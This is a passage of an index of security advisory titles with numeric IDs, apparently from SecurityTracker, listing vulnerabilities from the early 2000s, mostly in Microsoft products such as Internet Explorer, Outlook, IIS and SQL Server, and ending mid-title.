WINS Buffer Overflow in Name Value Lets Remote Users Execute Arbitrary Code [1012514] Microsoft WordPad Error in Converting Tables/Fonts Lets Remote Users Execute Arbitrary Code [1012512] Microsoft LSASS Bug in Validating Identity Tokens Lets Local Users Gain Elevated Privileges [1012461] KDE Konqueror Lets Remote Users Inject Content into Open Windows [1012460] Opera Lets Remote Users Inject Content into Open Windows [1012459] Apple Safari Lets Remote Users Inject Content into Open Windows [1012457] Mozilla Firefox Lets Remote Users Inject Content into Open Windows [1012444] Microsoft Internet Explorer Input Validation Error in Processing FTP URLs May Let Remote Users Inject Arbitrary FTP Commands [1012341] Microsoft WINS Memory Overwrite Lets Remote Users Execute Arbitary Code [1012288] Microsoft IE Custom 404 Error Message and execCommand SaveAs Lets Remote Users Bypass XP SP2 Download Warning Mechanisms [1012272] Mailtraq Windows Tray Icon Lets Local Users Gain System Privileges [1012271] Altiris AClient Service Windows Tray Icon Lets Local Users Gain System Privileges [1012234] Microsoft Internet Explorer on XP SP2 Has Unspecified Flaws That Let Remote Users Bypass File Download Restrictions [1012155] Microsoft Internet Security and Acceleration Server Reverse DNS Caching Bug Lets Remote Users Spoof Web Sites [1012154] Microsoft Proxy Server Reverse DNS Caching Bug Lets Remote Users Spoof Web Sites [1012138] Microsoft IE Discloses Whether Specified Files Exist to Remote Users [1012057] F-Secure Anti-Virus for Microsoft Exchange Lets Remote Users Bypass Anti-Virus Detection With a ZIP Archive [1012049] (Exploit Code Has Been Released) Microsoft Internet Explorer Buffer Overflow in IFRAME/EMBED Tag Processing Lets Remote Users Execute Arbitrary Code [1011987] Microsoft Internet Explorer Lets Remote Users Spoof the Status Bar Address with a Table Within a Link [1011895] Microsoft IE for Mac Multi-Window Browsing Errors Let Remote Users Spoof Sites [1011890] Microsoft Outlook May Display Images in Plaintext Only Mode [1011851] Microsoft IE AnchorClick Behavior and HTML Help Let Remote Users Execute Arbitrary Code [1011735] Microsoft Internet Explorer May Display the Incorrect URL When Loading a Javascript Homepage [1011706] Microsoft Operating System 'asycpict.dll' Lets Remote Users Crash the System [1011678] Microsoft IE MSN 'heartbeat.ocx' Component Has Unspecified Flaw [1011646] Microsoft Program Group Converter Buffer Overflow Lets Remote Users Execute Arbitrary Code [1011645] Microsoft Various Operating System Flaws Lets Remote Users Execute Code and Local Users Gain Elevated Privileges or Deny Service [1011644] Microsoft IE Plug-in Navigation Flaw Lets Remote Users Spoof URLs in the Addresses Bar [1011643] Microsoft IE Double Byte Parsing Flaw Lets Remote Users Spoof URLs in the Addresses Bar [1011642] Microsoft IE SSL Caching Flaw Lets Remote Users Run Scripting Code in the Context of Arbitrary Secure Sites [1011640] Microsoft IE Buffer Overflow in Install Engine Lets Remote Users Execute Arbitrary Code [1011639] Microsoft IE Buffer Overflow in Processing Cascading Style Sheets Lets Remote Users Execute Arbitrary Code [1011636] Microsoft SMTP Service Buffer Overflow in Processing DNS Responses May Let Remote Users Execute Arbitrary Code [1011635] Microsoft Excel Unspecified Flaw Lets Remote Users Execute Arbitrary Code [1011634] Microsoft NetDDE Buffer Overflow Lets Remote Users Execute Arbitrary Code With System Privileges [1011633] Microsoft IIS WebDAV XML Message Handler Error Lets Remote Users Deny Service [1011632] Microsoft NT RPC Runtime Library Buffer Overflow Lets Remote Users Deny Service [1011631] Microsoft NNTP Buffer Overflow Lets Remote Users Execute Arbitrary Code With SYSTEM Privileges [1011627] Windows 2003 Default ACL Permissions on the Firewall Service Lets Any Users Stop the Service [1011626] Microsoft Cabarc Directory Traversal Flaw Lets Remote Users Create/Overwrite Files on the Target System [1011565] Microsoft Word Parsing Flaw May Let Remote Users Execute Arbitrary Code [1011563] Microsoft Internet Explorer Lets Remote Users Access XML Documents [1011559] Microsoft .NET Forms Authentication Can Be Bypassed By Remote Users [1011434] Microsoft SQL Server Can Be Crashed By Remote Users Sending a Specially Crafted Large Buffer [1011374] Windows XP Service Pack 2 Firewall Configuration Error Exposes File and Print Sharing to Remote Users [1011344] IBM OEM Version of Windows XP Silently Creates Administrator Account With No Password [1011332] Microsoft Internet Explorer Bug in Setting Cookies in Certain Domains May Let Remote Users Conduct Session Fixation Attacks [1011253] Microsoft GDI+ Buffer Overflow in Processing JPEG Images Lets Remote Users Execute Arbitrary Code [1011252] Microsoft Works Suite Buffer Overflow in WordPerfect Converter Lets Remote Users Execute Arbitrary Code [1011251] Microsoft Publisher Buffer Overflow in WordPerfect Converter Lets Remote Users Execute Arbitrary Code [1011250] Microsoft FrontPage Buffer Overflow in WordPerfect Converter Lets Remote Users Execute Arbitrary Code [1011249] Microsoft Office Buffer Overflow in WordPerfect Converter Lets Remote Users Execute Arbitrary Code [1011200] F-Secure Anti-Virus for Microsoft Exchange Input Validation Bug in Content Scanner Server Lets Remote Users Deny Service [1011141] HP Systems Insight Manager May Not Let Users Login After Applying a Microsoft Security Patch [1011067] Microsoft Outlook Express May Disclose 'bcc:' Recipient Addresses [1011043] Microsoft Internet Explorer Local File IFRAME Error Response Lets Remote Users Determine if Files or Directories Exist [1010995] Windows XP SP2 May Display the Wrong Icon in Zip Archives [1010992] Microsoft Internet Security and Acceleration Server Does Not Block FTP Bounce Attacks [1010957] Microsoft Internet Explorer Unregistered Protocol State Error Lets Remote Users Spoof Location Bar [1010916] Microsoft Outlook Web Access Input Validation Hole in Redirection Query Permits Cross-Site Scripting Attacks [1010836] Windows Remote Desktop May Let Remote Users Crash the System [1010827] Microsoft Internet Explorer Error in 'mshtml.dll' in Processing GIF Files Lets Remote Users Crash the Browser [1010713] Microsoft Systems Management Server (SMS) Client Can Be Crashed By Remote Users [1010694] Microsoft IE Lets Remote Users Spoof Filenames Using CLSIDs [1010693] Microsoft Internet Explorer 'shell:' Protocol Lets Remote Users Execute Arbitrary Scripting Code in the Local Zone [1010692] Microsoft IIS 4.0 Buffer Overflow in Redirect Function Lets Remote Users Execute Arbitrary Code [1010690] Microsoft HTML Help Input Validation Error Lets Remote Users Execute Arbitrary Code [1010686] Microsoft Utility Manager Permits Local Applications to Run With Elevated Privileges [1010683] Microsoft Internet Explorer Same Name Javascript Bug Lets Remote Users Execute Arbitrary Javascript in the Domain of an Arbitrary Site [1010679] Microsoft Internet Explorer Access Control Flaw in popup.show() Lets Remote Users Execute Mouse-Click Actions [1010673] Microsoft Internet Explorer Can Be Crashed By Remote Users With Large Text Files [1010669] Mozilla Lets Remote Users Launch Local Windows Applications Via the 'shell:' Protocol [1010668] Firefox Lets Remote Users Launch Local Windows Applications Via the 'shell:' Protocol [1010667] Thunderbird Lets Remote Users Launch Local Windows Applications Via the 'shell:' Protocol [1010610] Microsoft IIS Web Server May Disclose Private IP Addresses in Certain Cases [1010550] Microsoft MN-500 Wireless Base Station Lets Remote Users Deny Administrative Access [1010491] Microsoft Internet Explorer Crashes When Saving Files With Special Character Strings [1010482] Microsoft Internet Explorer '%2F' URL Parsing Error Lets Remote Users Spoof Sites in the Trusted Zone [1010479] (US-CERT Issues Advisory) Microsoft Internet Explorer Cross-Domain Redirect Hole Lets Remote Users Execute Arbitrary Code [1010427] Microsoft DirectX DirectPlay Input Validation Error Lets Remote Users Crash the Application [1010189] Microsoft Outlook 2003 Scripting Restrictions Can Be Bypassed By Remote Users [1010175] Microsoft Visual Basic Buffer Overflow May Let Local Users Gain Elevated Privileges [1010166] Microsoft Outlook Express Mail Troubleshooting Function May Disclose SMTP Password to Local Users [1010165] Microsoft Internet Explorer Image Map URL Display Error Lets Remote Users Spoof URLs [1010157] Microsoft Internet Explorer showHelp Path Search Lets Remote Users Load Existing Local CHM Files [1010125] Microsoft Outlook 2003 Lets Remote Users Send E-mail to Cause the Recipient's Client to Contact a Remote Server [1010119] Microsoft Help and Support Center HCP URL Validation Error May Let Remote Users Execute Arbitrary Code If User Interactions Occur [1010092] Microsoft Internet Explorer 'file://' URL Processing Flaw Lets Remote Users Damage the Registry [1010079] Microsoft IIS ASP Script Cookie Processing Flaw May Disclose Application Information to Remote Users [1010009] Microsoft Internet Explorer SSL Icon Error May Let Remote Users Impersonate Secure Web Sites [1009939] Microsoft Internet Explorer Buffer Overflow in Processing SMB Share Names Lets Remote Users Execute Arbitrary Code [1009778] Microsoft H.323 Buffer Overflow Lets Remote Users Execute Arbitrary Code [1009777] Microsoft SSL Library Input Validation Error Lets Remote Users Crash the Service [1009769] Microsoft Utility Manager Lets Local Users Run Applications With Elevated Privileges [1009768] Microsoft Winlogon Buffer Overflow Lets Certain Remote Users Execute Arbitrary Code [1009760] Microsoft Virtual DOS Machine (VDM) Lets Local Users Gain Elevated Privileges [1009757] Microsoft Jet Database Engine 'msjet40.dll' Buffer Overflow Lets Remote Users Execute Arbitrary Code [1009754] Microsoft ASN.1 Library (msasn1.dll) Double-Free Memory Allocation Error May Let Remote Users Execute Arbitrary Code [1009753] Microsoft SSL Library PCT Buffer Overflow Lets Remote Users Execute Arbitrary Code [1009752] Microsoft Help and Support Center Input Validation Flaw Lets Remote Users Execute Arbitrary Code in the My Computer Zone [1009751] Microsoft LSASS Service Buffer Overflow Lets Remote Users Execute Arbitrary Code With SYSTEM Privileges [1009746] Microsoft Internet Explorer Bitmap Memory Allocation Error Lets Remote Users Cause All Available Memory to Be Consumed [1009743] Microsoft Outlook Express Can Be Crashed By Remote Users With Specially Crafted EML File [1009739] Microsoft Internet Explorer Javascript OLE Object Lets Remote Users Automatically Print Without Authorization [1009690] Microsoft Internet Explorer Security Domain Flaw in Accessing CHM Files Lets Remote Users Execute Arbitrary Code [1009666] Microsoft SharePoint Portal Server Input Validation Holes Permit Cross-Site Scripting Attacks [1009604] Microsoft Internet Explorer Does Not Correctly Display Links With Embedded FORM Data [1009603] Microsoft Outlook Express Does Not Correctly Display Links With Embedded FORM Data [1009546] Microsoft Operating Systems Have Unspecified Flaw That Yields Kernel Level Access to Local Users [1009361] Microsoft Internet Explorer Cookie Path Restrictions Can Be Bypassed By Remote Servers [1009360] Microsoft MSN Messenger May Disclose Known Files to Remote Users [1009358] Microsoft Office XP 'mailto' URL Parsing Bug Lets Remote Users Execute Arbitrary Code in the Local Computer Domain [1009357] Microsoft Outlook 'mailto' URL Parsing Bug Lets Remote Users Execute Arbitrary Code in the Local Computer Domain [1009243] Microsoft Internet Explorer (IE) May Leak Keystrokes Across Frames [1009128] Windows XP Kernel NtSystemDebugControl() Flaws Let Local Users With SeDebugPrivilege Execute Arbitrary Code in Kernel Mode [1009067] Microsoft Internet Explorer Integer Overflow in Processing Bitmap Files Lets Remote Users Execute Arbitrary Code [1009009] Microsoft Virtual PC for Mac Temporary File Flaw Lets Local Users Gain Root Privileges [1009007] Microsoft ASN.1 Library Heap Overflows Let Remote Users Execute Arbitrary Code With SYSTEM Privileges [1008901] Microsoft Internet Explorer Travel Log Input Validation Flaw Lets Remote Users Run Arbitrary Scripting Code in the Local Computer Domain [1008843] Windows XP Explorer Executes Arbitrary Code in Folders [1008698] Microsoft Internet Security and Acceleration Server H.323 Buffer Overflow Lets Remote Users Execute Arbitrary Code [1008658] Windows Ftp Server Format String Flaw May Let Remote Users Execute Arbitrary Code [1008586] Microsoft Office Security Features Can Be Bypassed [1008585] GoodTech Systems Telnet Server for Windows NT/2000/XP Can Be Crashed By Remote Users [1008583] Microsoft Internet Explorer Flaw in Processing '.lnk' Shortcuts Lets Remote Users Execute Arbitrary Code [1008578] Microsoft Internet Explorer showHelp() '\..\' Directory Traversal Flaw Lets Remote Users Execute Files on the Target System [1008570] Jordan Stojanovski Windows Telnet Server 'username' Buffer Overflow Lets Remote Users Execute Arbitrary Code [1008563] Microsoft IIS Fails to Log HTTP TRACK Requests [1008558] Microsoft Internet Explorer Trusted Domain Default Settings Facilitate Silent Installation of Executables [1008554] Microsoft IE for Mac May Disclose Sensitive Information in Secure URLs to Remote Sites via HTTP Referer Field [1008510] Openwares.org 'Microsoft IE Security Patch' URL Buffer Overflow Lets Remote Users Execute Arbitrary Code [1008428] Microsoft ASP.NET Web Services XML Parsing Lets Remote Users Consume CPU Resources With SOAP Requests [1008425] Microsoft IE Does Not Properly Display Some URLs [1008293] Microsoft Internet Explorer Invalid ContentType May Disclose Cache Directory Location to Remote Users [1008292] Microsoft Internet Explorer MHT Redirect Flaws Let Remote Users Execute Arbitrary Code [1008245] Microsoft SharePoint May Let Remote Users Access Protected Pages Without Authenticating [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters [1008151] Microsoft Works Macro Name Length Buffer Overflow Lets Remote Users Execute Arbitrary Code [1008150] Microsoft Word Macro Name Length Buffer Overflow Lets Remote Users Execute Arbitrary Code [1008149] Microsoft Excel Macro Security Flaw Lets Remote Users Execute Arbitrary Macro Codes [1008148] Microsoft SharePoint Team Services Buffer Overflow May Let Remote Users Execute Arbitrary Code [1008147] Microsoft FrontPage Server Extensions Buffer Overflow May Let Remote Users Execute Arbitrary Code [1008053] Microsoft Internet Explorer IFRAME Refresh Lets Remote HTML Access Local Files [1008000] Microsoft Internet Explorer Lets Remote Users Execute Arbitrary Files in the Local Zone Using a Specially Crafted IFRAME/Location Header [1007937] Microsoft Exchange Server Buffer Overflow in Processing Extended Verb Requests May Let Remote Users Execute Arbitrary Code [1007936] Microsoft Outlook Web Access Input Validation Flaw in 'Compose New Message' Permits Remote Cross-Site Scripting Attacks [1007935] Microsoft ListBox and ComboBox 'user32.dll' Buffer Overflow May Allow Local Users to Gain Elevated Privileges [1007934] Microsoft Help and Support Center HCP Buffer Overflow Lets Remote and Local Users Execute Arbitrary Code With Local Computer Privileges [1007931] Microsoft Authenticode Low Memory Flaw May Let Remote Users Execute Arbitrary Code [1007750] Microsoft BizTalk Server Default Directory Permissions May Let Remote Users Deny Service [1007689] Microsoft Internet Explorer Media Sidebar Flaw Lets Remote Users Execute Arbitrary Code on the System [1007687] Microsoft Internet Explorer Various Cross-Domain Flaws Permit Remote Scripting in Arbitrary Domains [1007618] Microsoft Visual Basic for Applications (VBA) in Multiple Microsoft Products Permits Remote Code Execution [1007617] Microsoft Converter for WordPerfect Has Buffer Overflow That Lets Remote Users Execute Arbitrary Code [1007616] Microsoft Word Document Validation Error Lets Macros Run Without Warning [1007614] Microsoft Access Snapshot Viewer ActiveX Control Buffer Overflow Lets Remote Users Execute Arbitrary Code [1007599] Microsoft Outlook May Fail to Delete Outlook Data From the PST File [1007538] Microsoft Internet Explorer Buffer Overflow in CR549.DLL ActiveX Control Permits Remote Code Execution [1007537] Microsoft Internet Explorer Object Tag Flaw Lets Remote Users Execute Arbitrary Code [1007536] Microsoft Internet Explorer Cache Script Flaw Lets Remote Users Execute Code in the My Computer Zone [1007535] Microsoft MDAC Database Component Lets Remote Users Execute Arbitrary Code [1007507] RSA SecurID Interaction With Microsoft URLScan May Disclose URLScan Configuration to Remote Users [1007493] Microsoft Visual Studio Buffer Overflow in 'mciwndx.ocx' May Let Remote Users Execute Arbitrary Code [1007388] Microsoft WebServer Beta for Pocket PC Yields Administrative Access to Remote Users [1007306] Microsoft Outlook Express Again Executes Scripting Code in Plain Text E-mail Messages [1007287] Windows Media Player Again Lets Remote Users Install and Execute Code [1007280] Microsoft Data/Desktop Engine Named Pipe and LPC Flaws Let Local Users Execute Arbitrary Code [1007279] Microsoft SQL Server Named Pipe and LPC Flaws Let Local Users Execute Arbitrary Code [1007278] Microsoft DirectX Heap Overflow in Loading MIDI Files Lets Remote Users Execute Arbitrary Code [1007265] Microsoft MDAC ODBC Component May Store Database Passwords in Plaintext in the Registry [1007262] Microsoft IIS 6.0 Vulnerabilities Permit Cross-Site Scripting and Password Changing Attacks Against Administrators [1007238] Microsoft Outlook Web Access Can Be Crashed By Remote Authenticated Users With an Outlook 2003 Client [1007206] Microsoft SMTP Service Can Be Crashed By Remote Users Sending Mail With an Invalid FILETIME Header [1007205] Microsoft Exchange Server Can Be Crashed By Remote Users Sending Mail With an Invalid FILETIME Header [1007190] Microsoft Internet Explorer 'Chromeless' Window May Let Remote Users Spoof Various User Interface Characteristics [1007189] WebShield SMTP for Windows NT Lets Remote Users Send Executables Through the Filter [1007172] Microsoft Jet Database Engine Buffer Overflow May Let Remote Users Execute Arbitrary Code [1007154] Microsoft SMB Buffer Overflow Lets Remote Authenticated Users Execute Arbitrary Code [1007133] Microsoft Outlook Web Access (OWA) May Disclose The User's OWA Password to Remote Users [1007126] Microsoft Internet Explorer Can By Crashed By Loading 'C:\aux' URL [1007098] Microsoft Commerce Server Discloses SQL Server Password to Local Users [1007094] Microsoft NetMeeting Directory Traversal Flaw Lets Remote Users Execute Arbitrary Code [1007072] Microsoft Internet Explorer Buffer Overflow in Processing Scripted 'HR' Tags Lets Remote Users Execute Arbitrary Code [1007070] Symantec Norton Anti-Virus Protection Fails to Detect Viruses on Floppy Diskettes Windows-XP [1007022] SurfControl for Microsoft ISA Server Discloses Files to Remote Users [1007008] Microsoft Internet Explorer XML Parsing Error Lets Remote Users Conduct Cross-Site Scripting Attacks [1007007] Microsoft Internet Explorer Custom HTTP Error Pages May Let Remote Users Execute Scripts in the Local Computer Zone [1006924] Microsoft Internet Explorer Input Validation Flaw in Displaying FTP Site Names Lets Remote Users Execute Arbitrary Scripting Code in Arbitrary Domains [1006918] Microsoft Internet Explorer (IE) Object Tag Buffer Overflow Lets Remote Users Execute Arbitrary Code [1006901] Microsoft UrlScan Default Configuration Displays Identifying Characteristics to Remote Users [1006867] Microsoft IIS Buffer Overflow Lets Remote Users With Upload Privileges Execute Code - Remote Users Can Also Crash the Service [1006844] Microsoft Internet Connection Firewall Fails to Block IP Version 6 Protocol [1006809] Microsoft Outlook Express Lets Remote Users Silently Install Arbitrary Code Using Audio and Media Files [1006808] Microsoft Outlook Express May Be Affected by W32/Palyh@MM Mass-Mailing Worm [1006807] Microsoft Outlook May Be Affected by W32/Palyh@MM Mass-Mailing Worm [1006789] Microsoft ISA Server Input Validation Flaw Lets Remote Users Execute Scripting Code in Arbitrary Security Domains [1006774] Microsoft Internet Explorer May Execute Arbitrary Code in the Wrong Security Domain When Processing Large Numbers of Download Requests [1006771] Microsoft Outlook Express Integer Overflow Lets Remote IMAP Servers Cause the Client to Crash [1006748] Microsoft Outlook Express May Be Affected by W32.Fizzer.A@mm Mass-Mailing Worm [1006747] Microsoft Outlook May Be Affected by W32.Fizzer.A@mm Mass-Mailing Worm [1006728] Microsoft .NET Passport Passwords, Including Hotmail Passwords, Can Be Changed By Remote Users [1006718] Windows Media Player Skin File Processing Lets Remote Users Write Arbitrary Files to Arbitrary Locations [1006704] Microsoft IIS Authentication Manager Discloses Validity of User Names to Remote Users [1006696] Microsoft Internet Explorer Web Folder Access Flaw Lets Remote Users Execute Arbitrary Scripting Code in the My Computer Zone [1006691] Microsoft MN-500 Wireless Base Station Backup Configuration File Discloses Administrator Password [1006686] Microsoft BizTalk Server Buffer Overflow Lets Remote Users Execute Arbitrary Code [1006634] Microsoft Internet Explorer Bugs (URLMON.DLL Buffer Overflow, File Upload Control Bypass, Plug-in URL Input Validation Flaw, CSS Modal Dialog Input Validation Flaw) Let Remote Users Execute Arbitrary Code or Access Local Files [1006608] Microsoft NTLM Authentication Protocol Flaw Lets Malicious SMB Servers Gain Access to Systems [1006607] Windows XP Service Control Manager Timing Flaw in Service Shutdown May Disclose Sensitive Information to Local Users [1006599] Microsoft REGEDIT.EXE May Let Local Users Gain Elevated Privileges [1006534] Microsoft Proxy Service in Proxy Server 2.0 Has Unspecified Flaw That Lets Remote Users Stop Traffic [1006533] Microsoft Firewall Service in ISA Server Has Unspecified Flaw That Lets Remote Users Stop Traffic [1006361] Microsoft ActiveSync Application Can Be Crashed By Remote Users [1006322] Microsoft ISA Server DNS Intrusion Detection Flaw Lets Remote Users Block DNS Inbound Requests [1006305] Microsoft IIS Web Server WebDAV Buffer Overflow Lets Remote Users Execute Arbitrary Code [1006280] Protegrity Secure.Data for Microsoft SQL Server 2000 Contains Buffer Oveflows That Let Remote Users Execute Arbitrary Code [1006257] Microsoft Internet Explorer Buffer Overflow in Processing '.MHT' Web Archives Lets Remote Users Execute Arbitrary Code [1006169] Microsoft Internet Explorer Vulnerable Codebase Object Lets Remote Users Execute Arbitrary Code [1006148] Microsoft Outlook Express Security Domain Flaw Lets Remote Users Silently Install and Execute Arbitrary Code [1006046] Microsoft Internet Explorer showHelp() Domain Security Flaw Lets Remote Users Execute Commands [1006036] Microsoft Internet Explorer May Let Remote Users Read or Write Files Via the dragDrop() Method [1005966] Microsoft Outlook May Fail to Encrypt User E-mail, Disclosing the Contents to Remote Users [1005964] Microsoft Locator Service Buffer Overflow Lets Remote Users Execute Arbitrary Code with System Level Privileges [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code [1005857] Microsoft Internet Explorer Bug in Loading Multimedia Files May Let Remote Users Execute Arbitrary Scripting Code in Other Domains [1005796] Microsoft SMB Signing Flaw May Let Remote Users With Access to an SMB Session Gain Control of a Network Client [1005757] Microsoft Outlook Bug in Processing Malformed E-mail Headers Lets Remote Users Crash the Client [1005751] SMB2WWW Web-Based Windows Networking Client Bug Lets Remote Users Execute Arbitrary Programs [1005747] Microsoft Internet Explorer showModalDialog() Input Validation Flaw Lets Remote Users Execute Arbitary Scripting Code in Any Security Zone [1005723] OpenWindows mailtool(1) Client for Sun Solaris Can Be Crashed By Remote Users [1005699] Microsoft Internet Explorer (IE) Java Class Loader Security Flaw Lets Remote Users Bypass Java Security Restrictions [1005698] Microsoft Java Virtual Machine (VM) Class Loader Security Flaw Lets Remote Users Bypass Java Security Restrictions [1005674] Microsoft Internet Explorer Buffer Overflow in Processing PNG Images Allows Denial of Service Attacks [1005672] Microsoft Internet Explorer MDAC Component Buffer Overflow Allows Remote Users to Execute Arbitrary Code [1005671] Microsoft Data Access Components (MDAC) Buffer Overflow Allows Remote Users to Execute Arbitrary Code [1005505] Microsoft Internet Information Server (IIS) Script Access Control Bug May Let Remote Authenticated Users Upload Unauthorized Executable Files [1005504] Microsoft Internet Information Server (IIS) WebDAV Memory Allocation Flaw Lets Remote Users Crash the Server [1005503] Microsoft Internet Information Server (IIS) Administrative Pages Allow Cross-Site Scripting Attacks [1005502] Microsoft Internet Information Server (IIS) Out-of-Process Access Control Bug Lets Certain Authenticated Users Gain Full Control of the Server [1005489] Microsoft Outlook Express May Fail to Delete E-mail Messages from Local Storage [1005466] Microsoft Internet Explorer Cached Object Flaw Lets Remote Users Execute Arbitrary Programs on the Target User's Computer [1005436] Microsoft Data Engine/Desktop Engine (MSDE) Bugs Let Remote Authenticated Users Create/Delete/Execute Web Tasks With SQL Server Agent Privileges [1005435] Microsoft SQL Server Bugs Let Remote Authenticated Users Create/Delete/Execute Web Tasks With SQL Server Agent Privileges [1005416] Microsoft Internet Explorer Flaw in WebBrowser Control Document Property Lets Remote Users Run Code in the My Computer Security Zone [1005405] Microsoft Outlook Express Buffer Overflow in Parsing S/MIME Messages Lets Remote Users Execute Arbitrary Code [1005395] Microsoft Content Management Server Input Validation Bug in 'ManualLogin.asp' Allows Cross-Site Scripting Attacks [1005377] Microsoft MSN Hotmail/Passport Login Page May Permit Cookie Stealing Via Cross-Site Scripting Attacks [1005345] MySQL Buffer Overflow Lets Local Users Gain System Privileges on Windows NT [1005339] Microsoft Services for Unix Interix SDK Bugs May Allow Denial of Service Conditions or May Execute Arbitrary Code [1005338] Microsoft Data/Desktop Engine (MSDE) Buffer Overflow Lets Remote Users Execute Arbitrary Code [1005337] Microsoft SQL Server Buffer Overflow Lets Remote Users Execute Arbitrary Code [1005296] Microsoft PPTP Service Buffer Overflow May Let Remote Users Execute Arbitrary Code [1005287] Microsoft FrontPage Server Extensions SmartHTML Interpreter Bugs May Let Remote Users Execute Arbitrary Code with System Privileges [1005254] Microsoft NT, 2000, and XP Operating Systems May Execute a 16-bit Application Even When The File Has No Execute Permissions [1005246] Microsoft Remote Desktop Protocol (RDP) Design Flaw May Disclose Information About the Unencrypted Data to Remote Users and May Let Data Be Modified During Transmission [1005243] Microsoft NetMeeting Remote Desktop Sharing Screen Saver Access Control Flaw Lets Physically Local Users Hijack Remote Sessions [1005223] (Microsoft Responds) Microsoft Word Document Processing File Include Bug May Let Remote Users Obtain Files From a Target User's System [1005210] Apple QuickTime Media Player Buffer Overflow Lets Remote Users Execute Arbitrary Code on Windows Systems [1005207] Microsoft Outlook Express Can Be Crashed By Remote Users Sending HTML Mail With Long Links Embedded [1005203] Microsoft Internet Explorer Frame Domain Security Bug Lets Remote Users Execute Arbitrary Code in the Local Computer Zone Via Frame URLs [1005200] Microsoft Internet Explorer Implementation Bugs in Java Native Methods May Let Remote Users Execute Arbitrary Code Via Malicious Applets [1005182] Microsoft Internet Explorer URL Decoding Inconsistency May Result in a Web Page Loading in the Incorrect Security Domain [1005177] Microsoft Visual FoxPro Filename Processing Bug Lets Remote Users Create HTML That Will Cause Arbitrary Code to Be Executed When the HTML is Loaded [1005128] Microsoft Internet Explorer XML Script Element Redirect Bug Lets Remote Users View XML Files on the Target User's Computer [1005127] Microsoft Visual Studio .NET Web Projects May Disclose the Web Directory Structure to Remote Users [1005123] Microsoft Internet Explorer Buffer Overflow in Unspecified Text Formatting ActiveX Control Lets Remote Users Execute Arbitrary Code [1005120] Microsoft Terminal Services Advanced Client (TSAC) ActiveX Control Buffer Overflow Lets Remote Users Execute Arbitrary Code [1005119] Microsoft Operating System SMB Protocol Implementation in the Network [1005112] Microsoft File Transfer Manager ActiveX Control Buffer Overflow May Let Remote Users Execute Arbitrary Code [1005083] Microsoft Internet Information Server (IIS) Web Server Fails to Properly Validate Client-side Certificates, Allowing Remote Users to Impersonate Other Users or Certificate Issuers [1005075] Microsoft Internet Explorer XMLDSO Java Class Lets Remote HTML Code Access Local Files [1005071] Microsoft DirectX Files Viewer ActiveX Control Has Buffer Overflow That Allows Remote Users to Execute Arbitrary Code [1005067] Microsoft Desktop Engine (MSDE) Extended Stored Procedures May Let Local Users Execute Commands With Database Administrator Privileges [1005066] Microsoft SQL Server Extended Stored Procedures May Let Local Users Execute Commands With Database Administrator Privileges [1005065] Microsoft Network Connection Manager Could Give a Local User System Level Privileges [1004997] Citrix MetaFrame Running on Windows NT4 Terminal Server Can Be Crashed By a Remote User via the Java ICA Web Terminal Interface [1004986] Microsoft Content Management Server Buffer Overflow in Authentication Function May Allow Remote Users to Execute Arbitrary Code With System Level Privileges [1004983] Microsoft Visual C++ Flaw in calloc() and Similar Functions May Result in Buffer Overflows in Applications That Use the Compiler or Runtime Library [1004965] Microsoft Internet Explorer SSL Implementation Flaw in Following Certificate Chains Allows Remote Users to Conduct Man-in-the-Middle Attacks to Obtain Unencrypted Data from the Browser [1004937] Windows 2000 Operating System Default Permissions for the System Partition Lets Local Users Bypass Individual File Permissions and Replace Key System Files [1004927] Microsoft Terminal Services Can Be Crashed By Remote Users Conducting a TCP SYN Scan in Certain Situations [1004917] Microsoft SQL Server MDAC Function Buffer Overflow May Let Remote Users Execute Arbitrary Code to Gain Full Control Over the Database [1004877] Microsoft Internet Explorer (IE) Web Browser JavaScript 'Same Origin Policy' Flaw Allows Remote Users to Create Malicious JavaScript to Retrieve Web Data from a Victim's Internal Network [1004862] Microsoft Outlook Express Flaw in Parsing XML Using Internet Explorer Allows a Remote User to Silently Deliver and Install an Executable on a Target User's Computer [1004831] Microsoft Data Engine (MSDE) Buffer Overflow in Database Consistency Checker May Let Remote Authenticated Users Execute Arbitrary Code with the Privileges of the Database Service [1004830] Microsoft SQL Server Buffer Overflow in Database Consistency Checker May Let Remote Authenticated Users Execute Arbitrary Code with the Privileges of the Database Service [1004829] Microsoft SQL Server Resolution Service Buffer Overflows Let Remote Users Execute Arbitrary Code with the Privileges of the SQL Service [1004828] Microsoft Exchange Server Buffer Overflow in Processing SMTP EHLO Command Lets Remote Users Execute Arbitrary Code on the Server with System Level Privileges [1004827] Microsoft Metadirectory Services Authentication Flaw May Let Remote Users Modify Data and Obtain Elevated Privileges on the System [1004805] Microsoft Outlook Express (and Possibly Outlook) Has File Attachment Name Bugs That Let Remote Users Send Malicious Mail to Bypass Attachment Type Filters and Modify the Apparent File Name and File Size [1004761] Microsoft Foundation Classes (MFC) Information Server Application Programming Interface (ISAPI) 'mfc42.dll' Contains Buffer Overflows That Can Crash the System or Possibly Allow for the Remote Execution of Arbitrary Code [1004757] Microsoft IIS SMTP Service Encapsulation Bug Lets Remote Users Relay Mail and Send SPAM Via the Service [1004746] Microsoft Internet Explorer Flaw in OBJECT Domain Security Enforcement Lets Remote Users Execute Code in Arbitrary Domains [1004744] Microsoft SQL Server Install Process May Disclose Sensitive Passwords to Local Users [1004739] Microsoft SQL Server Desktop Engine (MSDE) Buffer Overflow and Access Control Bug May Let Remote Authorized Users Execute Code with Elevated Privileges, Possibly Including Local System Privileges [1004738] Microsoft SQL Server Buffer Overflow and Access Control Bug May Let Remote Authorized Users Execute Code with Elevated Privileges, Possibly Including Local System Privileges [1004713] Worldspan for Windows Gateway Software Can Be Crashed By Remote Users Sending Malformed Packets [1004686] APC PowerChute Plus for Windows Default Configuration Creates a Shared Folder with World Writeable Permissions [1004646] ColdFusion MX Buffer Overflow When Used With Microsoft Internet Information Server (IIS) Lets Remote Users Crash the IIS Web Server or Execute Arbitrary Code [1004638] Windows Media Player May Let Remote Users Execute Code on a Target User's Computer or Let Local Users Gain Elevated Privileges [1004637] Microsoft Commerce Server Buffer Overflows and Other Flaws Let Remote Users Execute Arbitrary Code with LocalSystem Privileges [1004618] Microsoft Internet Explorer Can Be Crashed By Malicious AVI Object in HTML [1004602] Apache Tomcat Java Server for Windows Can Be Crashed By Remote Users Sending Malicious Requests to Hang All Available Working Threads [1004595] Microsoft Word Documents May Execute Remotely Supplied Macro Code Under Certain Conditions [1004594] Microsoft Excel Spreadsheet May Execute Remotely Supplied Macro Code Within Malicious 